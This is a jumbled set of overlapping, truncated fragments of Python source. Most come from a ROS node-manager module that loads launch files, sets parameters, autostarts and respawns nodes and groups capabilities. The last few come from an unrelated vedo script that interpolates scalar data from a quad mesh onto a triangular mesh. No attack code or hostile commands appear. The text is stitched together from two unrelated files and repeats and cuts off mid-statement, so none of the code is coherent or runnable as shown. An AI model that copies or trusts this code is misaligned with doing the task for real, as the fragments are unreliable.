"ListNodes, self.rosservice_list_nodes) # except: # import traceback # print traceback.format_exc() if self.do_autostart: if",
"= self.getPath(self.launch_file, self.package) rospy.loginfo(\"loading launch file: %s\", launch_path) self.masteruri = self._masteruri_from_ros() self.roscfg =",
"\"AS IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT # LIMITED",
"# if the 'capability_group' parameter found, assign node to the group if cap_param",
"rospy.get_param('~load_params_at_start', True) self.parameter_loaded = False rospy.loginfo(\"load_params_at_start: %s\" % self.load_params_at_start) self.argv = rospy.get_param('~argv', [])",
"if n.respawn: respawn = self._get_node('node_manager_fkie', 'respawn') # set the respawn environment variables respawn_params",
"if self.do_autostart: if not self.parameter_loaded: self.loadParams() for n in self.nodes: try: self.runNode(n, self.do_autostart)",
"paths = roslib.packages.find_resource(package, launch_file) if len(paths) > 0: # if more then one",
"StartException(\"Failed to clear parameter: %s\"%(msg)) # multi-call objects are not reusable param_server_multi =",
"= roslib.packages.find_resource(package, launch_file) if len(paths) > 0: # if more then one launch",
"HOME path @rtype: C{str} ''' try: import rospkg.distro distro = rospkg.distro.current_distro_codename() if distro",
"datatype in master.getPublishedTopics(''): if start_required == topic: start_now = True break if not",
"package [%s] not found!' % (filename, pkg)) return cmd def _get_start_exclude(self, node): param_name",
"XmlLoader() argv = self._filter_args(sys.argv) # remove namespace from sys.argv to avoid load the",
"the first one launch_file = paths[0] if os.path.isfile(launch_file) and os.path.exists(launch_file): return launch_file raise",
"try: result['min_runtime'] = int(self.roscfg.params[respawn_min_runtime].value) except: pass try: result['delay'] = int(self.roscfg.params[respawn_delay].value) except: pass return",
"except: import traceback print(traceback.format_exc()) import roslib.rosenv return roslib.rosenv.get_ros_home() @classmethod def _load_parameters(cls, masteruri, params,",
"param, p in self.roscfg.params.items(): if param.endswith('capabilities'): if isinstance(p.value, list): if len(p.value) > 0",
"in p.value: capabilies_descr[entry[0]] = {'type': ''.join([entry[1]]), 'images': entry[2].split(','), 'description': self._decode(entry[3])} # get the",
"node with given name from the currently loaded configuration. @param node: the name",
"% respawn_params['min_runtime'])) if respawn_params['delay'] > 0: n.env_args.append(('RESPAWN_DELAY', '%d' % respawn_params['delay'])) node_cmd = [respawn[0],",
"# get the capabilities description # use two separate loops, to create the",
"start timer for delayed start start_timer = threading.Timer(start_delay, self._run_node, args=(cmd, cwd, env, node,",
"self.do_autostart) self.load_params_at_start = rospy.get_param('~load_params_at_start', True) self.parameter_loaded = False rospy.loginfo(\"load_params_at_start: %s\" % self.load_params_at_start) self.argv",
"val: the string coding as system default @type val: str @return: the decoded",
"node): param_name = rospy.names.ns_join(node, 'default_cfg/autostart/required/publisher') topic = '' try: topic = self.roscfg.params[param_name].value if",
"['electric', 'diamondback', 'cturtle']: import roslib.rosenv return roslib.rosenv.get_ros_home() else: import rospkg return rospkg.get_ros_home() except:",
"if self.runService is not None: self.runService.shutdown('reload config') self.runService = None if self.listService is",
"print traceback.format_exc() if self.do_autostart: if not self.parameter_loaded: self.loadParams() for n in self.nodes: try:",
"del new_env[k] except: pass # add node environment parameter for k, v in",
"start_now = False # get published topics from ROS master master = rosgraph.masterapi.Master(self.masteruri)",
"the list with names of nodes with name spaces.''' self.sensors = {} '''@ivar:",
"and the following # disclaimer in the documentation and/or other materials provided #",
"= paths[0] if os.path.isfile(launch_file) and os.path.exists(launch_file): return launch_file raise LoadException('File %s in package",
"not rosgraph.names.is_global(topic): topic = rospy.names.ns_join(rosgraph.names.namespace(node), topic) except: pass return topic def _get_respawn_params(self, node):",
"return result def get_ros_home(self): ''' Returns the ROS HOME path depending on ROS",
"start_timer.start() if start_now and autostart and start_delay > 0: start_now = False #",
"the C{file} is an absolute path @type package: C{str} @return: the absolute path",
"= [] # the name of nodes with namespace self.sensors = {} #",
"if self.listService is None: self.listService = rospy.Service('~list_nodes', ListNodes, self.rosservice_list_nodes) except: import traceback print(traceback.format_exc())",
"_filter_args(self, argv): afilter = ['__ns:=', '__name:=', '_package:=', '_launch_file:='] result = [] for a",
"if cap_param in self.roscfg.params and self.roscfg.params[cap_param].value: p = self.roscfg.params[cap_param] if machine_name not in",
"dr.robot_type = '' dr.robot_descr = '' for param, p in self.roscfg.params.items(): if param.endswith('robots'):",
"If more then one launch file with the same name found in the",
"raise StartException(\"Failed to set parameter: %s\" % (msg)) except Exception: raise # re-raise",
"= result.decode(sys.getfilesystemencoding()) except: pass return result def getCapabilitiesDesrc(self): ''' Parses the launch file",
"str or array of string if sys.version_info[0] <= 2: import types string_types =",
"package. If more then one launch file with the same name found in",
"start_timer.start() if start_now: ps = subprocess.Popen(cmd, cwd=cwd, env=env) # wait for process to",
"rospy.Service('~run', Task, self.rosservice_start_node) if self.listService is None: self.listService = rospy.Service('~list_nodes', ListNodes, self.rosservice_list_nodes) except:",
"ns == cap_ns and p.value in groups: groups[p.value]['nodes'].append(node_fullname) added = True break if",
"raise StartException('Multiple executables are found! The first one was started! Exceutables:\\n%s' % str(cmd))",
"0 and len(p.value[0]) != 4: print(\"WRONG format, expected: ['name', 'type', 'images', 'description'] ->",
"of Fraunhofer nor the names of its # contributors may be used to",
"pending autostarts if self._pending_starts_last_printed != self._pending_starts: self._pending_starts_last_printed.clear() self._pending_starts_last_printed.update(self._pending_starts) rospy.loginfo(\"Pending autostarts %d: %s\", len(self._pending_starts),",
"path: the file name of the launch file @type path: C{str} @param package:",
"clear_params: param_server_multi.deleteParam(rospy.get_name(), p) r = param_server_multi() # for code, msg, _ in r:",
"for item in self.roscfg.nodes: if item.machine_name and not item.machine_name == 'localhost': machine =",
"in ns_dict.items(): for group, descr_dict in group_dict.items(): if descr_dict['nodes']: cap = Capability() cap.namespace",
"ListDescriptionResponse, ListNodesResponse # , LoadLaunch from rosgraph.rosenv import ROS_NAMESPACE from roslaunch import ROSLaunchConfig,",
"= self.roscfg.params[param_name].value if rosgraph.names.is_private(topic): rospy.logwarn('Private for autostart required topic `%s` is ignored!' %",
"to create the description list first for param, p in self.roscfg.params.items(): if param.endswith('capabilities'):",
"# ''' # Load the launch file # ''' # try: # self.__lock.acquire()",
"the following # disclaimer in the documentation and/or other materials provided # with",
"dr.robot_name = '' dr.robot_type = '' dr.robot_descr = '' for param, p in",
"ROSLaunchConfig() loader = XmlLoader() argv = self._filter_args(sys.argv) # remove namespace from sys.argv to",
"self.roscfg.nodes: itemname = rospy.names.ns_join(item.namespace, item.name) if itemname == node: n = item break",
"# remove namespace from sys.argv to avoid load the launchfile info local namespace",
"item.machine_name == 'localhost' else '' added = False cap_param = roslib.names.ns_join(node_fullname, 'capability_group') cap_ns",
"[]} result[machine_name][ns][p.value]['nodes'].append(node_fullname) return result def _masteruri_from_ros(self): ''' Returns the master URI depending on",
"code, msg, _ in r: # if code != 1: # raise StartException(\"Failed",
"if len(paths) > 0: # if more then one launch file is found,",
"path of the launch file @rtype: C{str} @raise LoadException: if the given file",
"import rospy import shlex import std_srvs.srv import subprocess import sys import threading from",
"self.roscfg.machines[machine].address if not machine or roslib.network.is_local_address(machine): for ns, group_dict in ns_dict.items(): for group,",
"for param, p in self.roscfg.params.items(): if param.endswith('robots'): if isinstance(p.value, list): if len(p.value) >",
"cwd = self.get_ros_home() elif n.cwd == 'node': cwd = os.path.dirname(cmd[0]) respawn = ['']",
"IN CONTRACT, STRICT # LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN",
"self._run_node, args=(cmd, cwd, env, node, autostart)) start_timer.start() if start_now and autostart and start_delay",
"try: import rospkg.distro distro = rospkg.distro.current_distro_codename() if distro in ['electric', 'diamondback', 'cturtle']: return",
"'' args = ['__ns:=%s' % n.namespace, '__name:=%s' % n.name] if not (n.cwd is",
"else: import rospkg return rospkg.get_ros_home() except: import traceback print(traceback.format_exc()) import roslib.rosenv return roslib.rosenv.get_ros_home()",
"multi-call style xmlrpc param_server_multi = xmlrpclib.MultiCall(param_server) # clear specified parameter namespaces # #2468",
"= rospy.Timer(rospy.Duration(2), self.timed_service_creation, True) # if self.nodes: # self.runService = rospy.Service('~run', Task, self.rosservice_start_node)",
"= self.get_ros_home() if not (n.cwd is None): if n.cwd == 'ROS_HOME': cwd =",
"topic = self.roscfg.params[param_name].value if rosgraph.names.is_private(topic): rospy.logwarn('Private for autostart required topic `%s` is ignored!'",
"return roslib.rosenv.get_ros_home() else: import rospkg return rospkg.get_ros_home() except: import traceback print(traceback.format_exc()) import roslib.rosenv",
"not None and not item.machine_name == 'localhost' else '' added = False cap_param",
"in clear_params: param_server_multi.deleteParam(rospy.get_name(), p) r = param_server_multi() # for code, msg, _ in",
"path # if package is set, try to find the launch file in",
"item.name) if itemname == node: n = item break if n is None:",
"%s\", len(self._pending_starts), self._pending_starts) def _get_node(self, pkg, filename): cmd = None try: cmd =",
"in the loaded configuration. ''' pass class DefaultCfg(object): def __init__(self): self.nodes = []",
"env, node, autostart=False): self._pending_starts.add(node) start_now = True start_delay = self._get_start_delay(node) start_required = self._get_start_required(node)",
"Parses the launch file for C{capabilities} and C{capability_group} parameter and creates dictionary for",
"n.namespace # set delayed autostart parameter self._run_node(popen_cmd, cwd, new_env, rospy.names.ns_join(n.namespace, n.name), autostart) if",
"break if not added: ns = cap_ns # add new group in the",
"Exception as e: raise StartException(str(e)) # handle different result types str or array",
": str, 'nodes' : [str]))))} ''' result = dict() capabilies_descr = dict() if",
"Load parameter self.launch_file = rospy.get_param('~launch_file', '') rospy.loginfo(\"launch_file: %s\" % self.launch_file) self.package = rospy.get_param('~package',",
"'') rospy.loginfo(\"launch_file: %s\" % self.launch_file) self.package = rospy.get_param('~package', '') rospy.loginfo(\"package: %s\" % self.package)",
"CONTRIBUTORS # \"AS IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT",
"if item.machine_name is not None and not item.machine_name == 'localhost' else '' added",
"different result types str or array of string if sys.version_info[0] <= 2: import",
"start_required == topic: start_now = True break if not start_now: # Start the",
"dictionary for grouping the nodes. @return: the capabilities description stored in this configuration",
"capabilies_descr[entry[0]] = {'type': ''.join([entry[1]]), 'images': entry[2].split(','), 'description': self._decode(entry[3])} # get the capability nodes",
"for waiting for the topic start_timer = threading.Timer(3., self._run_node, args=(cmd, cwd, env, node,",
"in ['BASH_ENV', 'ENV']: del new_env[k] except: pass # add node environment parameter for",
"= None try: # multi-call style xmlrpc param_server_multi = xmlrpclib.MultiCall(param_server) # clear specified",
"is not None: self.runService.shutdown('reload config') self.runService = None if self.listService is not None:",
"# if code != 1: # raise StartException(\"Failed to clear parameter: %s\"%(msg)) #",
"item.machine_name and not item.machine_name == 'localhost': machine = self.roscfg.machines[item.machine_name] if roslib.network.is_local_address(machine.address): self.nodes.append(roslib.names.ns_join(item.namespace, item.name))",
"tupel of (type, name, text) ''' self.package = '' self.file = '' self.__lock",
"= self.masteruri # if n.machine_name and not n.machine_name == 'localhost': # machine =",
"% self.load_params_at_start) self.argv = rospy.get_param('~argv', []) rospy.loginfo(\"argv: %s\" % self.argv) if not isinstance(self.argv,",
"% self.do_autostart) self.load_params_at_start = rospy.get_param('~load_params_at_start', True) self.parameter_loaded = False rospy.loginfo(\"load_params_at_start: %s\" % self.load_params_at_start)",
"entry from system default coding to unicode. @param val: the string coding as",
"not machine or roslib.network.is_local_address(machine): for ns, group_dict in ns_dict.items(): for group, descr_dict in",
"DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER # CAUSED AND ON ANY THEORY",
"''' The exception throwing while run a node containing in the loaded configuration.",
"C{capability_group} parameter and creates dictionary for grouping the nodes. @return: the capabilities description",
"k in ['BASH_ENV', 'ENV']: del new_env[k] except: pass # add node environment parameter",
"if not self.parameter_loaded: self.loadParams() for n in self.nodes: try: self.runNode(n, self.do_autostart) except Exception",
"len(cmd) == 0: raise StartException('%s in package [%s] not found!' % (filename, pkg))",
"master URI @rtype: C{str} ''' try: import rospkg.distro distro = rospkg.distro.current_distro_codename() if distro",
"def rosservice_list_nodes(self, req): ''' Callback for the ROS service to get the list",
"name of the node @type node: C{str} @raise StartException: if an error occurred",
"ROS parameter server. ''' params = dict() for param, value in self.roscfg.params.items(): params[param]",
"<= 2: import types string_types = types.StringTypes else: string_types = (str,) if isinstance(cmd,",
"descr_dict['nodes']: cap = Capability() cap.namespace = ns cap.name = group cap.type = descr_dict['type']",
"''' launch_file = path # if package is set, try to find the",
"STRICT # LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN # ANY",
"= None try: cmd = roslib.packages.find_node(pkg, filename) except roslib.packages.ROSPkgException as e: # multiple",
"k, v in n.env_args: new_env[k] = v # the ROS_NAMESPACE environment is used",
"file @type path: C{str} @param package: the package containing the launch file or",
"args=(cmd, cwd, env, node, False)) start_timer.start() if start_now: ps = subprocess.Popen(cmd, cwd=cwd, env=env)",
"not cap_ns: cap_ns = roslib.names.SEP cap_param = roslib.names.ns_join(cap_ns, 'capability_group') if cap_ns == node_fullname:",
"= val.replace(\"\\\\n \", \"\\n\") try: result = result.decode(sys.getfilesystemencoding()) except: pass return result def",
"# HACK to let the node_manager to update the view if delay_service_creation >",
"n.cwd == 'node': cwd = os.path.dirname(cmd[0]) respawn = [''] if n.respawn: respawn =",
"p.value in groups: groups[p.value]['nodes'].append(node_fullname) added = True break if not added: ns =",
"item.name) machine_name = item.machine_name if item.machine_name is not None and not item.machine_name ==",
"self.argv = [\"%s\" % self.argv] sys.argv.extend(self.argv) if self.do_autostart: rospy.set_param('~autostart', False) # initialize the",
"1: raise StartException('Multiple executables are found! The first one was started! Exceutables:\\n%s' %",
"the following disclaimer. # * Redistributions in binary form must reproduce the above",
"loaded configuration. ''' pass class DefaultCfg(object): def __init__(self): self.nodes = [] '''@ivar: the",
"(Line Feed) and decode the string entry from system default coding to unicode.",
"result = dict() capabilies_descr = dict() if self.roscfg is not None: # get",
"%s\" % self.package) self.do_autostart = rospy.get_param('~autostart', False) rospy.loginfo(\"do_autostart: %s\" % self.do_autostart) self.load_params_at_start =",
"configuration. ''' self.listService = None '''@ivar: The service will be created on each",
"cmd def _get_start_exclude(self, node): param_name = rospy.names.ns_join(node, 'default_cfg/autostart/exclude') try: return bool(self.roscfg.params[param_name].value) except: pass",
"print(traceback.format_exc()) def getPath(self, path, package=''): ''' Searches for a launch file. If package",
"# * Redistributions in binary form must reproduce the above # copyright notice,",
"the caller about a new configuration. ''' self.listService = None '''@ivar: The service",
"filename): cmd = None try: cmd = roslib.packages.find_node(pkg, filename) except roslib.packages.ROSPkgException as e:",
"self._decode(entry[2]) dr.robot_type = entry[1] dr.robot_images = entry[3].split(',') dr.robot_descr = self._decode(entry[4]) break except: pass",
"len(p.value) > 0 and len(p.value[0]) != 5: print(\"WRONG format, expected: ['host(ROS master Name)',",
"dict() if p.value not in result[machine_name][ns]: try: result[machine_name][ns][p.value] = {'type': capabilies_descr[p.value]['type'], 'images': capabilies_descr[p.value]['images'],",
"node names for item in self.roscfg.nodes: if item.machine_name and not item.machine_name == 'localhost':",
"'''@ivar: Sensor description: C{dict(node name : [(sensor type, sensor name, sensor description), ...])}'''",
"OF THE # POSSIBILITY OF SUCH DAMAGE. from __future__ import print_function from multimaster_msgs_fkie.msg",
"retain the above copyright # notice, this list of conditions and the following",
"found! The first one was started! Exceutables:\\n%s' % str(cmd)) def _run_node(self, cmd, cwd,",
"list with available nodes. ''' return ListNodesResponse(self.nodes) def rosservice_start_node(self, req): ''' Callback for",
"self.nodes.append(roslib.names.ns_join(item.namespace, item.name)) # get the robot description self.description_response = dr = ListDescriptionResponse() dr.robot_name",
"namespaces # #2468 unify clear params to prevent error for p in clear_params:",
"@raise LoadException: if the given file is not found ''' launch_file = path",
"ROS distribution API. @return: ROS HOME path @rtype: C{str} ''' try: import rospkg.distro",
"cap.namespace = ns cap.name = group cap.type = descr_dict['type'] cap.images = list(descr_dict['images']) cap.description",
"# are met: # # * Redistributions of source code must retain the",
"file # ''' # try: # self.__lock.acquire() # self.load(req.package, req.file, req.argv) # finally:",
"len(p.value[0]) != 5: print(\"WRONG format, expected: ['host(ROS master Name)', 'type', 'name', 'images', 'description']",
"0} respawn_max = rospy.names.ns_join(node, 'respawn/max') respawn_min_runtime = rospy.names.ns_join(node, 'respawn/min_runtime') respawn_delay = rospy.names.ns_join(node, 'respawn/delay')",
"# the name of nodes with namespace self.sensors = {} # sensor descriptions",
"= dict(os.environ) try: for k in ['BASH_ENV', 'ENV']: del new_env[k] except: pass #",
"for param, p in self.roscfg.params.items(): if param.endswith('capabilities'): if isinstance(p.value, list): if len(p.value) >",
"WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE",
"string, if the C{file} is an absolute path @type package: C{str} @return: the",
"info local namespace sys.argv = list(argv) # set the global environment to empty",
"import std_srvs.srv import subprocess import sys import threading from .screen_handler import ScreenHandler #",
"with available nodes. ''' return ListNodesResponse(self.nodes) def rosservice_start_node(self, req): ''' Callback for the",
"name of Fraunhofer nor the names of its # contributors may be used",
"to set parameter: %s\" % (msg)) except Exception: raise # re-raise as this",
"= dict() for param, value in self.roscfg.params.items(): params[param] = value # rospy.loginfo(\"register PARAMS:\\n%s\",",
"None: self.listService = rospy.Service('~list_nodes', ListNodes, self.rosservice_list_nodes) except: import traceback print(traceback.format_exc()) def getPath(self, path,",
"parameter namespaces # #2468 unify clear params to prevent error for p in",
"_get_start_delay(self, node): param_name = rospy.names.ns_join(node, 'default_cfg/autostart/delay') try: return float(self.roscfg.params[param_name].value) except: pass return 0.",
"service to start a node. ''' self.runNode(req.node) return [] def rosservice_reload(self, req): self.load(2.)",
"node_manager to update the view if delay_service_creation > 0.: t = threading.Timer(delay_service_creation, self._timed_service_creation)",
"package raise StartException(str(e)) except Exception as e: raise StartException(str(e)) # handle different result",
"# import traceback # print traceback.format_exc() if self.do_autostart: if not self.parameter_loaded: self.loadParams() for",
"= self.roscfg.params[cap_param] if machine_name not in result: result[machine_name] = dict() for (ns, groups)",
"found ''' launch_file = path # if package is set, try to find",
"> 0 and len(p.value[0]) != 4: print(\"WRONG format, expected: ['name', 'type', 'images', 'description']",
"the currently loaded configuration. @param node: the name of the node @type node:",
"for entry in p.value: capabilies_descr[entry[0]] = {'type': ''.join([entry[1]]), 'images': entry[2].split(','), 'description': self._decode(entry[3])} #",
"in n.remap_args: args.append('%s:=%s' % (remap[0], remap[1])) # masteruri = self.masteruri # if n.machine_name",
"HOME path depending on ROS distribution API. @return: ROS HOME path @rtype: C{str}",
"original on error ''' result = val.replace(\"\\\\n \", \"\\n\") try: result = result.decode(sys.getfilesystemencoding())",
"= threading.RLock() # Load parameter self.launch_file = rospy.get_param('~launch_file', '') rospy.loginfo(\"launch_file: %s\" % self.launch_file)",
"is not found ''' launch_file = path # if package is set, try",
"reproduce the above # copyright notice, this list of conditions and the following",
"TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS # FOR A PARTICULAR PURPOSE",
"result: result[machine_name] = dict() for (ns, groups) in result[machine_name].items(): if ns == cap_ns",
"self.masteruri # if n.machine_name and not n.machine_name == 'localhost': # machine = self.roscfg.machines[n.machine_name]",
"set() def _filter_args(self, argv): afilter = ['__ns:=', '__name:=', '_package:=', '_launch_file:='] result = []",
"self.sensors = {} # sensor descriptions launch_path = self.getPath(self.launch_file, self.package) rospy.loginfo(\"loading launch file:",
"# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, # INCIDENTAL,",
"rospy.logwarn('Private for autostart required topic `%s` is ignored!' % topic) topic = ''",
"OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, # INCIDENTAL, SPECIAL, EXEMPLARY, OR",
"cmd_args = [ScreenHandler.getSceenCmd(node)] cmd_args[len(cmd_args):] = node_cmd cmd_args.append(n.args) cmd_args[len(cmd_args):] = args # print 'runNode:",
"@return: ROS master URI @rtype: C{str} ''' try: import rospkg.distro distro = rospkg.distro.current_distro_codename()",
"for a in argv: in_filter = False for f in afilter: if a.startswith(f):",
"= n.launch_prefix if n.launch_prefix is not None else '' args = ['__ns:=%s' %",
"# # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS #",
"cap.type = descr_dict['type'] cap.images = list(descr_dict['images']) cap.description = descr_dict['description'] cap.nodes = list(descr_dict['nodes']) dr.capabilities.append(cap)",
"if item.machine_name and not item.machine_name == 'localhost': machine = self.roscfg.machines[item.machine_name] if roslib.network.is_local_address(machine.address): self.nodes.append(roslib.names.ns_join(item.namespace,",
"the parameter server \"\"\" try: import xmlrpclib except ImportError: import xmlrpc.client as xmlrpclib",
"services # rospy.Service('~load', LoadLaunch, self.rosservice_load_launch) self._reload_service = rospy.Service('~reload', std_srvs.srv.Empty, self.rosservice_reload) rospy.Service('~description', ListDescription, self.rosservice_description)",
"roslaunch import ROSLaunchConfig, XmlLoader import os import rosgraph.masterapi import rosgraph.names import roslib.names import",
"rospkg.distro.current_distro_codename() if distro in ['electric', 'diamondback', 'cturtle']: return roslib.rosenv.get_master_uri() else: return rosgraph.rosenv.get_master_uri() except:",
"std_srvs.srv import subprocess import sys import threading from .screen_handler import ScreenHandler # ,",
"DIRECT, INDIRECT, # INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, # BUT NOT",
"master = rosgraph.masterapi.Master(self.masteruri) for topic, datatype in master.getPublishedTopics(''): if start_required == topic: start_now",
"coding as system default @type val: str @return: the decoded string @rtype: C{unicode}",
"environment variables respawn_params = self._get_respawn_params(rospy.names.ns_join(n.namespace, n.name)) if respawn_params['max'] > 0: n.env_args.append(('RESPAWN_MAX', '%d' %",
"sensor descriptions launch_path = self.getPath(self.launch_file, self.package) rospy.loginfo(\"loading launch file: %s\", launch_path) self.masteruri =",
"param.endswith('robots'): if isinstance(p.value, list): if len(p.value) > 0 and len(p.value[0]) != 5: print(\"WRONG",
"in self.roscfg.params.items(): if param.endswith('robots'): if isinstance(p.value, list): if len(p.value) > 0 and len(p.value[0])",
"list): if len(p.value) > 0 and len(p.value[0]) != 4: print(\"WRONG format, expected: ['name',",
"''' Returns the master URI depending on ROS distribution API. @return: ROS master",
"rospy.names.ns_join(node, 'respawn/max') respawn_min_runtime = rospy.names.ns_join(node, 'respawn/min_runtime') respawn_delay = rospy.names.ns_join(node, 'respawn/delay') try: result['max'] =",
"the timer for waiting for the topic start_timer = threading.Timer(3., self._run_node, args=(cmd, cwd,",
"LoadException(Exception): ''' The exception throwing while searching for the given launch file. '''",
"the namespace of the node if ns not in result[machine_name]: result[machine_name][ns] = dict()",
"if n.namespace: new_env['ROS_NAMESPACE'] = n.namespace # set delayed autostart parameter self._run_node(popen_cmd, cwd, new_env,",
"is in exclude list, skip autostart\", n.name) return # env = n.env_args prefix",
"entry[0] or entry[0] == rospy.get_param('/mastername', ''): dr.robot_name = self._decode(entry[2]) dr.robot_type = entry[1] dr.robot_images",
"in tmp_cap_dict.items(): if machine in self.roscfg.machines: machine = self.roscfg.machines[machine].address if not machine or",
"from multimaster_msgs_fkie.srv import ListDescription, ListNodes, Task, ListDescriptionResponse, ListNodesResponse # , LoadLaunch from rosgraph.rosenv",
"[]} except: result[machine_name][ns][p.value] = {'type': '', 'images': [], 'description': '', 'nodes': []} result[machine_name][ns][p.value]['nodes'].append(node_fullname)",
"from pending autostarts try: self._pending_starts.remove(node) except: pass # print the current pending autostarts",
"if os.path.isfile(launch_file) and os.path.exists(launch_file): return launch_file raise LoadException('File %s in package [%s] not",
"specific prior written permission. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT",
"dict(os.environ) try: for k in ['BASH_ENV', 'ENV']: del new_env[k] except: pass # add"
] |
[
"let's rotate it a bit so it's visible # Interpolate first mesh onto",
"that radius set null value -1 g2.interpolateDataFrom( g1, on='cells', radius=0.1+eps, nullStrategy=1, nullValue=-1, )",
"0.01 g2 = Grid(res=(50,50)).pos(0.2, 0.2, 0.1).wireframe(0).lw(0) g2.triangulate() # Interpolate by averaging the closest",
"radius, # if there are no points in that radius set null value",
"set null value -1 g2.interpolateDataFrom( g1, on='cells', radius=0.1+eps, nullStrategy=1, nullValue=-1, ) g2.cmap('hot', 'gene',",
"-1 g2.interpolateDataFrom( g1, on='cells', radius=0.1+eps, nullStrategy=1, nullValue=-1, ) g2.cmap('hot', 'gene', on='cells', vmin=-1, vmax=1).addScalarBar()",
"new triangular mesh eps = 0.01 g2 = Grid(res=(50,50)).pos(0.2, 0.2, 0.1).wireframe(0).lw(0) g2.triangulate() #",
"scalars g1 = Grid(res=(25,25)).wireframe(0).lw(1) scalars = g1.points()[:,1] g1.cmap(\"viridis\", scalars, vmin=-1, vmax=1, name='gene') g1.mapPointsToCells()",
"= 0.01 g2 = Grid(res=(50,50)).pos(0.2, 0.2, 0.1).wireframe(0).lw(0) g2.triangulate() # Interpolate by averaging the",
"g1 = Grid(res=(25,25)).wireframe(0).lw(1) scalars = g1.points()[:,1] g1.cmap(\"viridis\", scalars, vmin=-1, vmax=1, name='gene') g1.mapPointsToCells() #",
"points: #g2.interpolateDataFrom(g1, on='cells', N=3) # Interpolate by picking points in a specified radius,",
"N=3) # Interpolate by picking points in a specified radius, # if there",
"mesh onto a new triangular mesh eps = 0.01 g2 = Grid(res=(50,50)).pos(0.2, 0.2,",
"the array to cells (faces) g1.addScalarBar(horizontal=1, pos=(0.7,0.04)) g1.rotateZ(20) # let's rotate it a",
"specified radius, # if there are no points in that radius set null",
"0.1).wireframe(0).lw(0) g2.triangulate() # Interpolate by averaging the closest 3 points: #g2.interpolateDataFrom(g1, on='cells', N=3)",
"g1.cmap(\"viridis\", scalars, vmin=-1, vmax=1, name='gene') g1.mapPointsToCells() # move the array to cells (faces)",
"in that radius set null value -1 g2.interpolateDataFrom( g1, on='cells', radius=0.1+eps, nullStrategy=1, nullValue=-1,",
"first mesh onto a new triangular mesh eps = 0.01 g2 = Grid(res=(50,50)).pos(0.2,",
"values from a quad-mesh to a tri-mesh\"\"\" from vedo import Grid, show #",
"radius=0.1+eps, nullStrategy=1, nullValue=-1, ) g2.cmap('hot', 'gene', on='cells', vmin=-1, vmax=1).addScalarBar() show(g1, g2, __doc__, axes=1)",
"averaging the closest 3 points: #g2.interpolateDataFrom(g1, on='cells', N=3) # Interpolate by picking points",
"visible # Interpolate first mesh onto a new triangular mesh eps = 0.01",
"to a tri-mesh\"\"\" from vedo import Grid, show # Make up some quad",
"null value -1 g2.interpolateDataFrom( g1, on='cells', radius=0.1+eps, nullStrategy=1, nullValue=-1, ) g2.cmap('hot', 'gene', on='cells',",
"g1.mapPointsToCells() # move the array to cells (faces) g1.addScalarBar(horizontal=1, pos=(0.7,0.04)) g1.rotateZ(20) # let's",
"g2.triangulate() # Interpolate by averaging the closest 3 points: #g2.interpolateDataFrom(g1, on='cells', N=3) #",
"eps = 0.01 g2 = Grid(res=(50,50)).pos(0.2, 0.2, 0.1).wireframe(0).lw(0) g2.triangulate() # Interpolate by averaging",
"Make up some quad mesh with associated scalars g1 = Grid(res=(25,25)).wireframe(0).lw(1) scalars =",
"= g1.points()[:,1] g1.cmap(\"viridis\", scalars, vmin=-1, vmax=1, name='gene') g1.mapPointsToCells() # move the array to",
"with associated scalars g1 = Grid(res=(25,25)).wireframe(0).lw(1) scalars = g1.points()[:,1] g1.cmap(\"viridis\", scalars, vmin=-1, vmax=1,",
"quad-mesh to a tri-mesh\"\"\" from vedo import Grid, show # Make up some",
"vedo import Grid, show # Make up some quad mesh with associated scalars",
"scalars, vmin=-1, vmax=1, name='gene') g1.mapPointsToCells() # move the array to cells (faces) g1.addScalarBar(horizontal=1,",
"some quad mesh with associated scalars g1 = Grid(res=(25,25)).wireframe(0).lw(1) scalars = g1.points()[:,1] g1.cmap(\"viridis\",",
"Interpolate by picking points in a specified radius, # if there are no",
"(faces) g1.addScalarBar(horizontal=1, pos=(0.7,0.04)) g1.rotateZ(20) # let's rotate it a bit so it's visible",
"0.2, 0.1).wireframe(0).lw(0) g2.triangulate() # Interpolate by averaging the closest 3 points: #g2.interpolateDataFrom(g1, on='cells',",
"to cells (faces) g1.addScalarBar(horizontal=1, pos=(0.7,0.04)) g1.rotateZ(20) # let's rotate it a bit so",
"g1, on='cells', radius=0.1+eps, nullStrategy=1, nullValue=-1, ) g2.cmap('hot', 'gene', on='cells', vmin=-1, vmax=1).addScalarBar() show(g1, g2,",
"onto a new triangular mesh eps = 0.01 g2 = Grid(res=(50,50)).pos(0.2, 0.2, 0.1).wireframe(0).lw(0)",
"a new triangular mesh eps = 0.01 g2 = Grid(res=(50,50)).pos(0.2, 0.2, 0.1).wireframe(0).lw(0) g2.triangulate()",
"are no points in that radius set null value -1 g2.interpolateDataFrom( g1, on='cells',",
"picking points in a specified radius, # if there are no points in",
"the closest 3 points: #g2.interpolateDataFrom(g1, on='cells', N=3) # Interpolate by picking points in",
"a specified radius, # if there are no points in that radius set",
"Grid(res=(25,25)).wireframe(0).lw(1) scalars = g1.points()[:,1] g1.cmap(\"viridis\", scalars, vmin=-1, vmax=1, name='gene') g1.mapPointsToCells() # move the",
"g1.rotateZ(20) # let's rotate it a bit so it's visible # Interpolate first",
"by picking points in a specified radius, # if there are no points",
"a quad-mesh to a tri-mesh\"\"\" from vedo import Grid, show # Make up",
"3 points: #g2.interpolateDataFrom(g1, on='cells', N=3) # Interpolate by picking points in a specified",
"Grid, show # Make up some quad mesh with associated scalars g1 =",
"import Grid, show # Make up some quad mesh with associated scalars g1",
"Interpolate by averaging the closest 3 points: #g2.interpolateDataFrom(g1, on='cells', N=3) # Interpolate by",
